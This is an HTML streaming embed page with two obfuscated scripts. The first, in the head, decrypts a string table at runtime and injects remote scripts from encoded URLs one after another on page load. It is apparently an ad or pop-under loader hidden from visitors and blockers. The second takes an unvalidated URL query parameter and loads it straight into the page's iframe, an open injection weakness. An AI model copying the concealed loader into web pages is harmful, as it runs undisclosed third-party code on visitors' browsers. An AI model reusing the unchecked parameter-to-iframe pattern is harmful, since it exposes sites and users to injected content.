<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        * { margin: 0; padding: 0; overflow-x: hidden; }
       .responsive-iframe {
  position: absolute;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
       }
    </style>
    <title>Streaming!</title>
    <script type="text/javascript" data-cfasync="false">
(function(){var cb9c5f8532c97bbaee5eae937aa10dc0="ET-dfgrt_DUJGxdsq_9yqZPt9Ifr9_rflO26Moet5bHYya1texY7m_jDLuZw0lCBU1lSWZUBfAzHWfQJkQ";var b=['w50UwofCscKHfxDCsQ==','LRQ0dDfDkRfCs8OAw5pTZ8Oydw==','wrTDiMKUwr9DRgJUX8KqE8OHbw==','wpomwqNwQA==','I8K3EkVjVMORI8KvI8KlwqjDjMKPw7/Cp8OjHMOROsOqVi5Gw6/DtnTDmsOWZMOpVQ0Tw7HCt8KkVg==','MsKlHUPCmMOGw5xlwo3CsyPCnMOrPsKewqHDjSTDnlPCtBI9wpE=','fcOtw5slwpZYRQ==','L8O9w4lUV8K0wrsqwqfDpA==','wo7Do2d1','LMKvwo7CsAsQS1diwrItw7cKP8KYTsOSRkxjw6jDjMOyHjfDmMOUTcO1w5TDnSTDisO7wq3DncOYwoTDusKFwoklwq9g','w6QuGMKywrho','w4rDhB8/wrDCqUfCuwXDv8OWwoQj','w7sHYcKmRsOTwprCkw==','CcKxeA==','wo3Dq198','X1x5w5bDm8KuOMOHw68=','wprDoEBqwrhEK8OxPGHCiw==','acK9w6LDiSTCj8OkasOUw57CrsOr','wp1Yw5vCrgcTw7UTwqXCnsOdwqPCiMO0O8OmRCrClXBtHcOzwohK','YsOvLlVkHQ==','wp5Aw5zDrRAZw6U9wrTChcOWwrw=','wpgZwqJEwrlaKsKu','wo1XwqVMwpXDpQ==','w5Zjw5XDnMKqTsKN','ZMKTwr3DnMOiZ07CvS08Qx4=','w4IqVyBcJsKgw4XDu8KlwoYcwrZ/Gw==','SRA2wp8lw5jDlgLDlk9MwqI9fMO5wr0if0xk','fsKewrzDkMOgZw=='];(function(a,c){var e=function(g){while(--g){a['push'](a['shift']());}};e(++c);}(b,0x10e));var c=function(a,d){a=a-0x0;var e=b[a];if(c['QCvJLw']===undefined){(function(){var h;try{var j=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');h=j();}catch(k){h=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';h['atob']||(h['atob']=function(l){var m=String(l)['replace'](/=+$/,'');var n='';for(var o=0x0,p,q,r=0x0;q=m['charAt'](r++);~q&&(p=o%0x4?p*0x40+q:q,o++%0x4)?n+=String['fromCharCode'](0xff&p>>(-0x2*o&0x6)):0x0){q=i['indexOf'](q);}return n;});}());var g=function(h,l){var m=[],n=0x0,o,p='',q='';h=atob(h);for(var t=0x0,u=h['length'];t<u;t++){q+='%'+('00'+h['charCodeAt'](t)['toString'](0x10))['slice'](-0x2);}h=decodeURIComponent(q);var r;for(r=0x0;r<0x100;r++){m[r]=r;}for(r=0x0;r<0x100;r++){n=(n+m[r]+l['charCodeAt'](r%l['length']))%0x100;o=m[r];m[r]=m[n];m[n]=o;}r=0x0;n=0x0;for(var v=0x0;v<h['length'];v++){r=(r+0x1)%0x100;n=(n+m[r])%0x100;o=m[r];m[r]=m[n];m[n]=o;p+=String['fromCharCode'](h['charCodeAt'](v)^m[(m[r]+m[n])%0x100]);}return p;};c['ELKfrn']=g;c['Xfzwaq']={};c['QCvJLw']=!![];}var f=c['Xfzwaq'][a];if(f===undefined){if(c['RdNcih']===undefined){c['RdNcih']=!![];}e=c['ELKfrn'](e,d);c['Xfzwaq'][a]=e;}else{e=f;}return e;};var w=window;w[c('0x12','7oO#')]=[[c('0x14','2I9e'),0x481051],[c('0x1','J7fG'),0x0],[c('0xb','wbgw'),'0'],[c('0x1b','Na2e'),0x0],[c('0x5','%mQN'),![]],[c('0xc','2NEL'),0x0],[c('0x2','v0Zl'),!0x0]];var l=[c('0xe','S*4V'),c('0x13','kT0)'),c('0x0','v0Zl'),c('0xf','TCiN')],a=0x0,e,s=function(){if(!l[a])return;e=w[c('0x16','f^j8')][c('0x15','FD6J')](c('0x9','XFCv'));e[c('0x18','mKye')]=c('0x7','qQLU');e[c('0xd','kp[L')]=!0x0;var d=w[c('0x3','J7PV')][c('0x8','zsl*')](c('0x4','lh6n'))[0x0];e[c('0x17','hkML')]=c('0xa','7&$W')+l[a];e[c('0x1a','mKye')]=c('0x19','zICC');e[c('0x10','WZN5')]=function(){a++;s();};d[c('0x11','iVgn')][c('0x6','XFCv')](e,d);};s();})();
</script>
</head>
<body>
    <div class="container">
        <iframe width="100%" class="responsive-iframe" height="100%" id="video" src="" allowFullScreen allowfullscreen="allowfullscreen" webkitallowfullscreen mozallowfullscreen oallowfullscreen msallowfullscreen allowfullscreen="true"frameborder="0" scrolling="no" marginheight="0" marginwidth="0" fullscreen></iframe>
    </div>
    <script type="text/javascript">
    var _0x4fe5=['getElementById','src','exec','179686MRXnfF','location','193235qCrVbx','194505uFGIMv','129047sBETTh','772919tIpwio','video','1019384vhYCDI','83958DLZaUD','1gYSVLT','replace','=([^$#]*)','3tNmKOV','href'];var _0x592da6=_0xc389;(function(_0x8f0194,_0x3a7486){var _0x341013=_0xc389;while(!![]){try{var _0xd63d7=-parseInt(_0x341013(0xd6))+-parseInt(_0x341013(0xe4))+-parseInt(_0x341013(0xd5))*-parseInt(_0x341013(0xdf))+parseInt(_0x341013(0xdb))+-parseInt(_0x341013(0xd8))+parseInt(_0x341013(0xdc))*-parseInt(_0x341013(0xd7))+parseInt(_0x341013(0xda));if(_0xd63d7===_0x3a7486)break;else _0x8f0194['push'](_0x8f0194['shift']());}catch(_0x165078){_0x8f0194['push'](_0x8f0194['shift']());}}}(_0x4fe5,0x6356a));function get(_0x34e915){var _0x39b5aa=_0xc389;_0x34e915=_0x34e915[_0x39b5aa(0xdd)](/[\[]/,'\x5c[')[_0x39b5aa(0xdd)](/[\]]/,'\x5c]');var _0x9bf8bf='[\x5c?$]'+_0x34e915+_0x39b5aa(0xde),_0x25a7f0=new RegExp(_0x9bf8bf),_0x2b8952=_0x25a7f0[_0x39b5aa(0xe3)](window[_0x39b5aa(0xd4)][_0x39b5aa(0xe0)]);return null==_0x2b8952?'/':unescape(_0x2b8952[0x1]);}var link=get(_0x592da6(0xe2));function _0xc389(_0x486862,_0x40476c){_0x486862=_0x486862-0xd4;var _0x4fe58b=_0x4fe5[_0x486862];return _0x4fe58b;}let videoIframe=document[_0x592da6(0xe1)](_0x592da6(0xd9));videoIframe[_0x592da6(0xe2)]=link;
</script>
</body>
</html>